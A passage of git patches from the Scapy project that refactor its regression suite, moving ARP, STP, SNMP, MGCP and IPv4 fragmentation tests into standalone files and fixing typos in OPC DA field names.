elem2 = raw(opcdaPingPacket_Build) @@ -60,9 +60,9 @@ opcDaResponsePacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=2, \ pfc_flags = 3,integerRepresentation='bigEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderN(fragLenght=212,authLenght=0,callID=21)\ + res=0)/ OpcDaHeaderN(fragLength=212,authLength=0,callID=21)\ / OpcDaResponse(allocHint=188,contextId=6,cancelCount=0,reserved=0,\ - subData=b'0'*(212-32))) + stubData=b'0'*(212-32))) elem2 = raw(opcDaResponsePacket_Build) assert( elem1 == elem2 ) @@ -75,9 +75,9 @@ opcDaResponseLEPacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=2, \ pfc_flags = 3,integerRepresentation='littleEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderNLE(fragLenght=212,authLenght=0,callID=21)\ + res=0)/ OpcDaHeaderNLE(fragLength=212,authLength=0,callID=21)\ / OpcDaResponseLE(allocHint=188,contextId=6,cancelCount=0,reserved=0,\ - subData=b'0'*(212-32))) + stubData=b'0'*(212-32))) elem2 = raw(opcDaResponseLEPacket_Build) assert( elem1 == elem2 ) @@ -140,7 +140,7 @@ ocDaAlter_contextPacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=14, \ pfc_flags = 3,integerRepresentation='bigEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderN(fragLenght=72,authLenght=0,callID=23)\ + res=0)/ OpcDaHeaderN(fragLength=72,authLength=0,callID=23)\ / OpcDaAlter_context(maxXmitFrag=5840,maxRecvtFrag=5840,\ assocGroupId=534853)) \ / '\x00\x00\x00\x01\x07\x00\x01\x00\x01\x01\x00\x00\x00\x00\x00\x00\xc0'\ @@ -156,7 +156,7 @@ ocDaAlter_contextLEPacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=14, \ pfc_flags = 3,integerRepresentation='littleEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderNLE(fragLenght=72,authLenght=0,callID=23)\ + res=0)/ OpcDaHeaderNLE(fragLength=72,authLength=0,callID=23)\ / OpcDaAlter_contextLE(maxXmitFrag=5840,maxRecvtFrag=5840,\ assocGroupId=534853)) \ / '\x01\x00\x00\x00\x07\x00\x01\x00\x01\x01\x00\x00\x00\x00\x00\x00\xc0'\ From 764c7a8d5d56d0b421b48cdc18964ebb150877c4 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 22 Dec 2020 16:44:48 +0100 Subject: [PATCH 0471/1632] Standalone Layer 2 unit tests Co-authored-by: Phil Co-authored-by: Gabriel Co-authored-by: Pierre LALET --- test/regression.uts | 80 ------------------------------------- test/scapy/layers/l2.uts | 85 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 85 insertions(+), 80 deletions(-) create mode 100644 test/scapy/layers/l2.uts diff --git a/test/regression.uts b/test/regression.uts index 6c59cb832c6..58c7b667aa6 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -811,16 +811,6 @@ assert udp.cvsup == 5999 scapy_delete_temp_files() -= Test ARPingResult output -~ manufdb - -ar = ARPingResult([(None, Ether(src='70:ee:50:50:ee:70')/ARP(psrc='192.168.0.1'))]) -with ContextManagerCaptureOutput() as cmco: - ar.show() - result_ar = cmco.get_output() - -assert result_ar.startswith(" 70:ee:50:50:ee:70 Netatmo 192.168.0.1") - = Test utility functions - network related ~ netaccess @@ -1679,16 +1669,6 @@ s,r=ans[0] s.show() s.show(2) -= Arping -~ netaccess tcpdump -* This test assumes the local network is a /24. This is bad. -def _test(): - ip_address = conf.route.route("0.0.0.0")[2] - ip_address - arping(ip_address+"/24") - -retry_test(_test) - = send() and sniff() ~ netaccess tcpdump import time @@ -3564,20 +3544,6 @@ if WINDOWS: from scapy.arch.windows import _route_add_loopback _route_add_loopback() -############ -############ -+ STP tests - -= STP - Basic Instantiation -assert raw(STP()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x02\x00\x0f\x00' - -= STP - Basic Dissection - -s = STP(b'\x00\x00\x00\x00\x00\x00\x00\x12\x13\x14\x15\x16\x17\x00\x00\x00\x00\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x01\x00\x14\x00\x05\x00\x0f\x00') -assert s.rootmac == "12:13:14:15:16:17" -assert s.bridgemac == "aa:aa:aa:aa:aa:aa" -assert s.hellotime == 5 - ############ ############ @@ -4474,52 +4440,6 @@ def test_IPID_count(): test_IPID_count() -############ -############ -+ ARP - -= Simple Ether() / ARP() show -(Ether() / ARP()).show() - -= ARP for IPv4 - -p = raw(ARP()) -assert p == raw(ARP(ptype=0x0800)) -p = ARP(p) -assert p.ptype == 0x0800 -assert valid_ip(p.pdst) -assert valid_ip(p.psrc) -assert isinstance(p.payload, NoPayload) - -= ARP for IPv6 - -p = ARP(raw(ARP(ptype=0x86dd))) -assert p.ptype == 0x86dd -assert valid_ip6(p.pdst) -assert valid_ip6(p.psrc) -assert isinstance(p.payload, NoPayload) - -= Dummy ARP - -p = ARP(raw(ARP(plen=2, hwlen=1, hwdst="x", hwsrc="y", pdst="aa", psrc="bb"))) -assert p.hwdst == b"x" -assert p.hwsrc == b"y" -assert p.pdst == b"aa" -assert p.psrc == b"bb" -assert isinstance(p.payload, NoPayload) - -p = ARP(raw(ARP(plen=1, hwlen=1))) -assert p.hwdst == p.hwsrc == p.pdst == p.psrc == b"\x00" -assert isinstance(p.payload, NoPayload) - -p = ARP(pdst='192.168.178.0/24') -assert "Net" in repr(p) - -= Test RawVal on ARP - -pkt = ARP(psrc="1.1.1.1", hwtype=RawVal(b"test")) -assert bytes(pkt) == b'test\x08\x00\x00\x04\x00\x01\x01\x01\x01\x01\x00\x00\x00\x00' - ############ ############ + Fields diff --git a/test/scapy/layers/l2.uts b/test/scapy/layers/l2.uts new file mode 100644 index 00000000000..92df628b93f --- /dev/null +++ b/test/scapy/layers/l2.uts @@ -0,0 +1,85 @@ +% Layer 2 regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ Layer 2 Unit Tests + += Arping +~ netaccess tcpdump +* This test assumes the local network is a /24. This is bad. +def _test(): + ip_address = conf.route.route("0.0.0.0")[2] + ip_address + arping(ip_address+"/24") + +retry_test(_test) + += Test ARPingResult output +~ manufdb + +ar = ARPingResult([(None, Ether(src='70:ee:50:50:ee:70')/ARP(psrc='192.168.0.1'))]) +with ContextManagerCaptureOutput() as cmco: + ar.show() + result_ar = cmco.get_output() + +assert result_ar.startswith(" 70:ee:50:50:ee:70 Netatmo 192.168.0.1") + + +############ +############ ++ STP tests + += STP - Basic Instantiation +assert raw(STP()) == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x02\x00\x0f\x00' + += STP - Basic Dissection + +s = STP(b'\x00\x00\x00\x00\x00\x00\x00\x12\x13\x14\x15\x16\x17\x00\x00\x00\x00\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x01\x00\x14\x00\x05\x00\x0f\x00') +assert s.rootmac == "12:13:14:15:16:17" +assert s.bridgemac == "aa:aa:aa:aa:aa:aa" +assert s.hellotime == 5 + + +############ +############ ++ ARP + += Simple Ether() / ARP() show +(Ether() / ARP()).show() + += ARP for IPv4 + +p = raw(ARP()) +assert p == raw(ARP(ptype=0x0800)) +p = ARP(p) +assert p.ptype == 0x0800 +assert valid_ip(p.pdst) +assert valid_ip(p.psrc) +assert isinstance(p.payload, NoPayload) + += ARP for IPv6 + +p = ARP(raw(ARP(ptype=0x86dd))) +assert p.ptype == 0x86dd +assert valid_ip6(p.pdst) +assert valid_ip6(p.psrc) +assert isinstance(p.payload, NoPayload) + += Dummy ARP + +p = ARP(raw(ARP(plen=2, hwlen=1, hwdst="x", hwsrc="y", pdst="aa", psrc="bb"))) +assert p.hwdst == b"x" +assert p.hwsrc == b"y" +assert p.pdst == b"aa" +assert p.psrc == b"bb" +assert isinstance(p.payload, NoPayload) + +p = ARP(raw(ARP(plen=1, hwlen=1))) +assert p.hwdst == p.hwsrc == p.pdst == p.psrc == b"\x00" +assert isinstance(p.payload, NoPayload) + +p = ARP(pdst='192.168.178.0/24') +assert "Net" in repr(p) From 859380bb4a9629152035c9459b4ed675f4502568 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 21 Dec 2020 21:30:53 +0100 Subject: [PATCH 0472/1632] Duplicated MGCP unit tests removed --- test/regression.uts | 13 ------------- 1 file changed, 13 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 58c7b667aa6..62fccca26a3 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3778,19 +3778,6 @@ for binfrm in ["\x00" * 15, b"\x00" * 17]: assert rc -############ -############ -+ MGCP tests - -= MGCP - build -s = raw(IP(src="127.0.0.1")/UDP()/MGCP(endpoint="scapy@secdev.org", transaction_id="04523")) -s == b'E\x00\x00I\x00\x01\x00\x00@\x11|\xa1\x7f\x00\x00\x01\x7f\x00\x00\x01\n\xa7\n\xa7\x005\xf8\xaeAUEP 04523 scapy@secdev.org MGCP 1.0 NCS 1.0\n' - -= MGCP - dissect -pkt = Ether(b'\x1b\x81\xb8\xa8J5\xe3\xebn\x90q\xb8\x08\x00E\x00\x00E\x00\x01\x00\x00@\x11\xf7\xde\xc0\xa8\x00\xff\xc0\xa8\x00y\n\xa7\n\xa7\x001\x05\xb5AUEP 155 god@heaven.com MGCP 1.0 NCS 1.0\n') -assert pkt[MGCP].endpoint == b'god@heaven.com' - - ############ ############ + Addresses generators From 131d947233d8ee964f9c88d5df11d57f54f15c7b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 20 Dec 2020 10:30:16 +0100 Subject: [PATCH 0473/1632] Standalone SNMP unit tests Co-authored-by: Phil Co-authored-by: Gabriel --- test/regression.uts | 59 +--------------------------------- test/scapy/layers/snmp.uts | 66 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 67 insertions(+), 58 deletions(-) create mode 100644 test/scapy/layers/snmp.uts diff --git a/test/regression.uts b/test/regression.uts index 62fccca26a3..9a7fe2acb86 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1238,52 +1238,7 @@ assert(r == b'5\x00\x00\x14\x00\x01\x00\x00 \x00\xac\xe7\x7f\x00\x00\x01\x7f\x00 ############ ############ -+ SNMP tests - -= SNMP assembling -~ SNMP ASN1 -r = raw(SNMP()) -r -assert(r == b'0\x18\x02\x01\x01\x04\x06public\xa0\x0b\x02\x01\x00\x02\x01\x00\x02\x01\x000\x00') -p = SNMP(version="v2c", community="ABC", PDU=SNMPbulk(id=4,varbindlist=[SNMPvarbind(oid="1.2.3.4",value=ASN1_INTEGER(7)),SNMPvarbind(oid="4.3.2.1.2.3",value=ASN1_IA5_STRING("testing123"))])) -p -r = raw(p) -r -assert(r == b'05\x02\x01\x01\x04\x03ABC\xa5+\x02\x01\x04\x02\x01\x00\x02\x01\x000 0\x08\x06\x03*\x03\x04\x02\x01\x070\x14\x06\x06\x81#\x02\x01\x02\x03\x16\ntesting123') - -= SNMP disassembling -~ SNMP ASN1 -x=SNMP(b'0y\x02\x01\x00\x04\x06public\xa2l\x02\x01)\x02\x01\x00\x02\x01\x000a0!\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x07\n\x86\xde\xb78\x04\x0b172.31.19.20#\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x07\n\x86\xde\xb76\x04\r255.255.255.00\x17\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x05\n\x86\xde\xb9`\x02\x01\x01') -x.show() -assert(x.community==b"public" and x.version == 0) -assert(x.PDU.id == 41 and len(x.PDU.varbindlist) == 3) -assert(x.PDU.varbindlist[0].oid == "1.3.6.1.4.1.253.8.64.4.2.1.7.10.14130104") -assert(x.PDU.varbindlist[0].value == b"172.31.19.2") -assert(x.PDU.varbindlist[2].oid == "1.3.6.1.4.1.253.8.64.4.2.1.5.10.14130400") -assert(x.PDU.varbindlist[2].value == 1) - -= Basic UDP/SNMP bindings -~ SNMP ASN1 -z = UDP()/x -z = UDP(raw(z)) -assert SNMP in z - -x = UDP()/SNMP() -assert x.sport == x.dport == 161 - -= Basic SNMPvarbind build -~ SNMP ASN1 -x = SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.4.0"), value=RandBin()) -x = SNMPvarbind(raw(x)) -assert isinstance(x.value, ASN1_STRING) - -= Failing SNMPvarbind dissection -~ SNMP ASN1 -try: - SNMP('0a\x02\x01\x00\x04\x06public\xa3T\x02\x02D\xd0\x02\x01\x00\x02\x01\x000H0F\x06\x08+\x06\x01\x02\x01\x01\x05\x00\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D') - assert False -except BER_Decoding_Error: - pass ++ ASN.1 tests = ASN1 - ASN1_Object assert ASN1_Object(1) == ASN1_Object(1) @@ -5044,18 +4999,6 @@ assert os.path.isfile(filename_css) os.remove(filename_js) os.remove(filename_css) -#= Test snmpwalk() -# -#~ netaccess -#def test_snmpwalk(dst): -# with ContextManagerCaptureOutput() as cmco: -# snmpwalk(dst=dst) -# output = cmco.get_output() -# expected = "No answers\n" -# assert(output == expected) -# -#test_snmpwalk("secdev.org") - = test get_temp_dir dname = get_temp_dir() diff --git a/test/scapy/layers/snmp.uts b/test/scapy/layers/snmp.uts new file mode 100644 index 00000000000..31afbb4f416 --- /dev/null +++ b/test/scapy/layers/snmp.uts @@ -0,0 +1,66 @@ +% SNMP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + + +############ +############ ++ SNMP layer + += SNMP assembling +~ SNMP ASN1 +r = raw(SNMP()) +r +assert(r == b'0\x18\x02\x01\x01\x04\x06public\xa0\x0b\x02\x01\x00\x02\x01\x00\x02\x01\x000\x00') +p = SNMP(version="v2c", community="ABC", PDU=SNMPbulk(id=4,varbindlist=[SNMPvarbind(oid="1.2.3.4",value=ASN1_INTEGER(7)),SNMPvarbind(oid="4.3.2.1.2.3",value=ASN1_IA5_STRING("testing123"))])) +p +r = raw(p) +r +assert(r == b'05\x02\x01\x01\x04\x03ABC\xa5+\x02\x01\x04\x02\x01\x00\x02\x01\x000 0\x08\x06\x03*\x03\x04\x02\x01\x070\x14\x06\x06\x81#\x02\x01\x02\x03\x16\ntesting123') + += SNMP disassembling +~ SNMP ASN1 +x=SNMP(b'0y\x02\x01\x00\x04\x06public\xa2l\x02\x01)\x02\x01\x00\x02\x01\x000a0!\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x07\n\x86\xde\xb78\x04\x0b172.31.19.20#\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x07\n\x86\xde\xb76\x04\r255.255.255.00\x17\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x05\n\x86\xde\xb9`\x02\x01\x01') +x.show() +assert(x.community==b"public" and x.version == 0) +assert(x.PDU.id == 41 and len(x.PDU.varbindlist) == 3) +assert(x.PDU.varbindlist[0].oid == "1.3.6.1.4.1.253.8.64.4.2.1.7.10.14130104") +assert(x.PDU.varbindlist[0].value == b"172.31.19.2") +assert(x.PDU.varbindlist[2].oid == "1.3.6.1.4.1.253.8.64.4.2.1.5.10.14130400") +assert(x.PDU.varbindlist[2].value == 1) + += Basic UDP/SNMP bindings +~ SNMP ASN1 +z = UDP()/x +z = UDP(raw(z)) +assert SNMP in z + +x = UDP()/SNMP() +assert x.sport == x.dport == 161 + += Basic SNMPvarbind build +~ SNMP ASN1 +x = SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.4.0"), value=RandBin()) +x = SNMPvarbind(raw(x)) +assert isinstance(x.value, ASN1_STRING) + += Failing SNMPvarbind dissection +~ SNMP ASN1 +try: + SNMP('0a\x02\x01\x00\x04\x06public\xa3T\x02\x02D\xd0\x02\x01\x00\x02\x01\x000H0F\x06\x08+\x06\x01\x02\x01\x01\x05\x00\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D\x00\x03\x01\x02D') + assert False +except BER_Decoding_Error: + pass + +#= Test snmpwalk() +# +#~ netaccess +#def test_snmpwalk(dst): +# with ContextManagerCaptureOutput() as cmco: +# snmpwalk(dst=dst) +# output = cmco.get_output() +# expected = "No answers\n" +# assert(output == expected) +# +#test_snmpwalk("secdev.org") + From d0c9be10ddd6fbaac7d33d66013ae8e6f95328fe Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 19 Dec 2020 19:30:19 +0100 Subject: [PATCH 0474/1632] Standalone IPv4 unit tests Co-authored-by: Phil Co-authored-by: Pierre LALET Co-authored-by: IrinaPopa Co-authored-by: Piotr Bartosiewicz --- test/regression.uts | 584 ------------------------------------- test/scapy/layers/inet.uts | 583 ++++++++++++++++++++++++++++++++++++ 2 files changed, 583 insertions(+), 584 deletions(-) create mode 100644 test/scapy/layers/inet.uts diff --git a/test/regression.uts b/test/regression.uts index 9a7fe2acb86..71099b827e1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1779,70 +1779,6 @@ else: True -############ -############ -+ Test IP options - -= IP options individual assembly -~ IP options -r = raw(IPOption()) -r -assert(r == b'\x00\x02') -r = raw(IPOption_NOP()) -r -assert(r == b'\x01') -r = raw(IPOption_EOL()) -r -assert(r == b'\x00') -r = raw(IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"])) -r -assert(r == b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08') -r = raw(IPOption_Timestamp(internet_address='192.168.15.7', timestamp=11223344)) -r -assert(r == b'D\x0c\t\x01\xc0\xa8\x0f\x07\x00\xabA0') -r = raw(IPOption_Timestamp(flg=0, length=8)) -r -assert(r == b'D\x08\t\x00\x00\x00\x00\x00') - -= IP options individual dissection -~ IP options -io = IPOption(b"\x00") -io -assert(io.option == 0 and isinstance(io, IPOption_EOL)) -io = IPOption(b"\x01") -io -assert(io.option == 1 and isinstance(io, IPOption_NOP)) -lsrr=b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08' -p=IPOption_LSRR(lsrr) -p -q=IPOption(lsrr) -q -assert(p == q) - -= IP assembly and dissection with options -~ IP options -p = IP(src="9.10.11.12",dst="13.14.15.16",options=IPOption_SDBM(addresses=["1.2.3.4","5.6.7.8"]))/TCP() -r = raw(p) -r -assert(r == b'H\x00\x004\x00\x01\x00\x00@\x06\xa2q\t\n\x0b\x0c\r\x0e\x0f\x10\x95\n\x01\x02\x03\x04\x05\x06\x07\x08\x00\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00') -q=IP(r) -q -assert( isinstance(q.options[0],IPOption_SDBM) ) -assert( q[IPOption_SDBM].addresses[1] == "5.6.7.8" ) -p.options[0].addresses[0] = '5.6.7.8' -assert( IP(raw(p)).options[0].addresses[0] == '5.6.7.8' ) -p = IP(src="9.10.11.12", dst="13.14.15.16", options=[IPOption_NOP(),IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"]),IPOption_Security(transmission_control_code="XYZ")])/TCP() -p -r = raw(p) -r -assert(r == b'K\x00\x00@\x00\x01\x00\x00@\x06\xf3\x83\t\n\x0b\x0c\r\x0e\x0f\x10\x01\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08\x82\x0b\x00\x00\x00\x00\x00\x00XYZ\x00\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00_K\x00\x00') -q = IP(r) -q -assert(q[IPOption_LSRR].get_current_router() == "1.2.3.4") -assert(q[IPOption_Security].transmission_control_code == b"XYZ") -assert(q[TCP].flags == 2) - - ############ ############ + Ether tests with IPv6 @@ -2303,376 +2239,6 @@ with mock.patch("scapy.utils.warning") as warning: os.remove(filename) assert any("Inconsistent" in arg for arg in warning.call_args[0]) -############ -############ -+ Sessions - -= IPSession - dissect fragmented IP packets on-the-flow -packet = IP()/("data"*1000) -frags = fragment(packet) -tmp_file = get_temp_file() -wrpcap(tmp_file, frags) - -dissected_packets = [] -def callback(pkt): - dissected_packets.append(pkt) - -sniff(offline=tmp_file, session=IPSession, prn=callback) -assert len(dissected_packets) == 1 -assert raw(dissected_packets[0]) == raw(packet) - -= StringBuffer - -buffer = StringBuffer() -assert not buffer - -buffer.append(b"kie", 5) -buffer.append(b"e", 11) -buffer.append(b"pi", 2) -buffer.append(b"pi", 9) -buffer.append(b"n", 4) - -assert bytes_hex(bytes(buffer)) == b'0070696e6b696500706965' -assert len(buffer) == 11 -assert buffer - - -############ -############ -+ Test fragment() / defragment() functions - -= fragment() -payloadlen, fragsize = 100, 8 -assert fragsize % 8 == 0 -fragcount = (payloadlen // fragsize) + bool(payloadlen % fragsize) -* create the packet -pkt = IP() / ("X" * payloadlen) -* create the fragments -frags = fragment(pkt, fragsize) -* count the fragments -assert len(frags) == fragcount -* each fragment except the last one should have MF set -assert all(p.flags == 1 for p in frags[:-1]) -assert frags[-1].flags == 0 -* each fragment except the last one should have a payload of fragsize bytes -assert all(len(p.payload) == 8 for p in frags[:-1]) -assert len(frags[-1].payload) == ((payloadlen % fragsize) or fragsize) - -= fragment() and overloaded_fields -pkt1 = Ether() / IP() / UDP() -pkt2 = fragment(pkt1)[0] -pkt3 = pkt2.__class__(raw(pkt2)) -assert pkt1[IP].proto == pkt2[IP].proto == pkt3[IP].proto - -= fragment() already fragmented packets -payloadlen = 1480 * 3 -ffrags = fragment(IP() / ("X" * payloadlen), 1480) -ffrags = fragment(ffrags, 1400) -len(ffrags) == 6 -* each fragment except the last one should have MF set -assert all(p.flags == 1 for p in ffrags[:-1]) -assert ffrags[-1].flags == 0 -* fragment offset should be well computed -plen = 0 -for p in ffrags: - assert p.frag == plen // 8 - plen += len(p.payload) - -assert plen == payloadlen - -= fragment() with non-multiple-of-8 MTU -paylen = 1400 + 1 -frags1 = fragment(IP() / ("X" * paylen), paylen) -assert len(frags1) == 1 -frags2 = fragment(IP() / ("X" * (paylen + 1)), paylen) -assert len(frags2) == 2 -assert len(frags2[0]) == 20 + paylen - paylen % 8 -assert len(frags2[1]) == 20 + 1 + paylen % 8 - -= defrag() -nonfrag, unfrag, badfrag = defrag(frags) -assert not nonfrag -assert not badfrag -assert len(unfrag) == 1 - -= defragment() -defrags = defragment(frags) -* we should have one single packet -assert len(defrags) == 1 -* which should be the same as pkt reconstructed -assert defrags[0] == IP(raw(pkt)) - -= defragment() uses timestamp of last fragment -payloadlen, fragsize = 100, 8 -assert fragsize % 8 == 0 -packet = Ether()/IP()/("X" * payloadlen) -frags = fragment(packet, fragsize) -for i,frag in enumerate(frags): - frag.time -= 100 + i - -last_time = max(frag.time for frag in frags) -defrags = defragment(frags) -assert defrags[0].time == last_time -nonfrag, defrags, badfrag = defrag(frags) -assert defrags[0].time == last_time - -= defragment() - Missing fragments - -pkts = fragment(IP(dst="10.0.0.5")/ICMP()/("X"*1500)) -assert len(defragment(pkts[1:])) == 1 - -= defrag() / defragment() - Real DNS packets - -import base64 - -a = base64.b64decode('bnmYJ63mREVTUwEACABFAAV0U8UgADIR+u0EAgIECv0DxAA1sRIL83Z7gbCBgAABAB0AAAANA255YwNnb3YAAP8AAcAMAAYAAQAAA4QAKgZ2d2FsbDDADApob3N0bWFzdGVywAx4Og5wAAA4QAAADhAAJOoAAAACWMAMAC4AAQAAA4QAmwAGCAIAAAOEWWm9jVlgdP0mfQNueWMDZ292AHjCDBL0C1rEKUjsuG6Zg3+Rs6gj6llTABm9UZnWk+rRu6nPqW4N7AEllTYqNK+r6uFJ2KhfG3MDPS1F/M5QCVR8qkcbgrqPVRBJAG67/ZqpGORppQV6ib5qqo4ST5KyrgKpa8R1fWH8Fyp881NWLOZekM3TQyczcLFrvw9FFjdRwAwAAQABAAADhAAEobkenMAMAC4AAQAAA4QAmwABCAIAAAOEWWm9jVlgdP0mfQNueWMDZ292ABW8t5tEv9zTLdB6UsoTtZIF6Kx/c4ukIud8UIGM0XdXnJYx0ZDyPDyLVy2rfwmXdEph3KBWAi5dpRT16nthlMmWPQxD1ecg9rc8jcaTGo8z833fYJjzPT8MpMTxhapu4ANSBVbv3LRBnce2abu9QaoCdlHPFHdNphp6JznCLt4jwAwAMAABAAADhAEIAQEDCAMBAAF77useCfI+6T+m6Tsf2ami8/q5XDtgS0Ae7F0jUZ0cpyYxy/28DLFjJaS57YiwAYaabkkugxsoSv9roqBNZjD+gjoUB+MK8fmfaqqkSOgQuIQLZJeOORWD0gAj8mekw+S84DECylbKyYEGf8CB3/59IfV+YkTcHhXBYrMNxhMK1Eiypz4cgYxXiYUSz7jbOmqE3hU2GinhRmNW4Trt4ImUruSO+iQbTTj6LtCtIsScOF4vn4gcLJURLHOs+mf1NU9Yqq9mPC9wlYZk+8rwqcjVIiRpDmmv83huv4be1x1kkz2YqTFwtc33Fzt6SZk96Qtk2wCgg8ZQqLKGx5uwIIyrwAwAMAABAAADhAEIAQEDCAMBAAGYc7SWbSinSc3u8ZcYlO0+yZcJD1vqC5JARxZjKNzszHxc9dpabBtR9covySVu1YaBVrlxNBzfyFd4PKyjvPcBER5sQImoCikC+flD5NwXJbnrO1SG0Kzp8XXDCZpBASxuBF0vjUSU9yMqp0FywCrIfrbfCcOGAFIVP0M2u8dVuoI4nWbkRFc0hiRefoxc1O2IdpR22GAp2OYeeN2/tnFBz/ZMQitU2IZIKBMybKmWLC96tPcqVdWJX6+M1an1ox0+NqBZuPjsCx0/lZbuB/rLHppJOmkRc7q2Fw/tpHOyWHV+ulCfXem9Up/sbrMcP7uumFz0FeNhBPtg3u5kA5OVwAwAMAABAAADhACIAQADCAMBAAF5mlzmmq8cs6Hff0qZLlGKYCGPlG23HZw2qAd7N2FmrLRqPQ0R/hbnw54MYiIs18zyfm2J+ZmzUvGd+gjHGx3ooRRffQQ4RFLq6g6oxaLTbtvqPFbWt4Kr2GwX3UslgZCzH5mXLNpPI2QoetIcQCNRdcxn5QpWxPppCVXbKdNvvcAMADAAAQAAA4QAiAEAAwgDAQABqeGHtNFc0Yh6Pp/aM+ntlDW1fLwuAWToGQhmnQFBTiIUZlH7QMjwh5oMExNp5/ABUb3qBsyk9CLanRfateRgFJCYCNYofrI4S2yqT5X9vvtCXeIoG/QqMSl3PJk4ClYufIKjMPgl5IyN6yBIMNmmsATlMMu5TxM68a/CLCh92L3ADAAuAAEAAAOEAJsAMAgCAAADhFlpvY1ZYHT9Jn0DbnljA2dvdgAViVpFoYwy9dMUbOPDHTKt/LOtoicvtQbHeXiUSQeBkGWTLyiPc/NTW9ZC4WK5AuSj/0+V') -b = base64.b64decode('bnmYJ63mREVTUwEACABFAAV0U8UgrDIR+kEEAgIECv0DxApz1F5olFRytjhNlG/JbdW0NSAFeUUF4rBRqsly/h6nFWKoQfih35Lm+BFLE0FoMaikWCjGJQIuf0CXiElMSQifiDM+KTeecNkCgTXADAAuAAEAAAOEARsAMAgCAAADhFlpvY1ZYHT9VwUDbnljA2dvdgAdRZxvC6VlbYUVarYjan0/PlP70gSz1SiYCDZyw5dsGo9vrZd+lMcAm5GFjtKYDXeCb5gVuegzHSNzxDQOa5lVKLQZfXgVHsl3jguCpYwKAygRR3mLBGtnhPrbYcPGMOzIxO6/UE5Hltx9SDqKNe2+rtVeZs5FyHQE5pTVGVjNED9iaauEW9UF3bwEP3K+wLgxWeVycjNry/l4vt9Z0fyTU15kogCZG8MXyStJlzIgdzVZRB96gTJbGBDRFQJfbE2Af+INl0HRY4p+bqQYwFomWg6Tzs30LcqAnkptknb5peUNmQTBI/MU00A6NeVJxkKK3+lf2EuuiJl+nFpfWiKpwAwAMwABAAADhAAJAQAADASqu8zdwAwALgABAAADhACbADMIAgAAA4RZab2NWWB0/SZ9A255YwNnb3YAVhcqgSl33lqjLLFR8pQ2cNhdX7dKZ2gRy0vUHOa+980Nljcj4I36rfjEVJCLKodpbseQl0OeTsbfNfqOmi1VrsypDl+YffyPMtHferm02xBK0agcTMdP/glpuKzdKHTiHTlnSOuBpPnEpgxYPNeBGx8yzMvIaU5rOCxuO49Sh/PADAACAAEAAAOEAAoHdndhbGw0YcAMwAwAAgABAAADhAAKB3Z3YWxsMmHADMAMAAIAAQAAA4QACgd2d2FsbDNhwAzADAACAAEAAAOEAAoHdndhbGwxYcAMwAwALgABAAADhACbAAIIAgAAA4RZab2NWWB0/SZ9A255YwNnb3YANn7LVY7YsKLtpH7LKhUz0SVsM/Gk3T/V8I9wIEZ4vEklM9hI92D2aYe+9EKxOts+/py6itZfANXU197pCufktASDxlH5eWSc9S2uqrRnUNnMUe4p3Jy9ZCGhiHDemgFphKGWYTNZUJoML2+SDzbv9tXo4s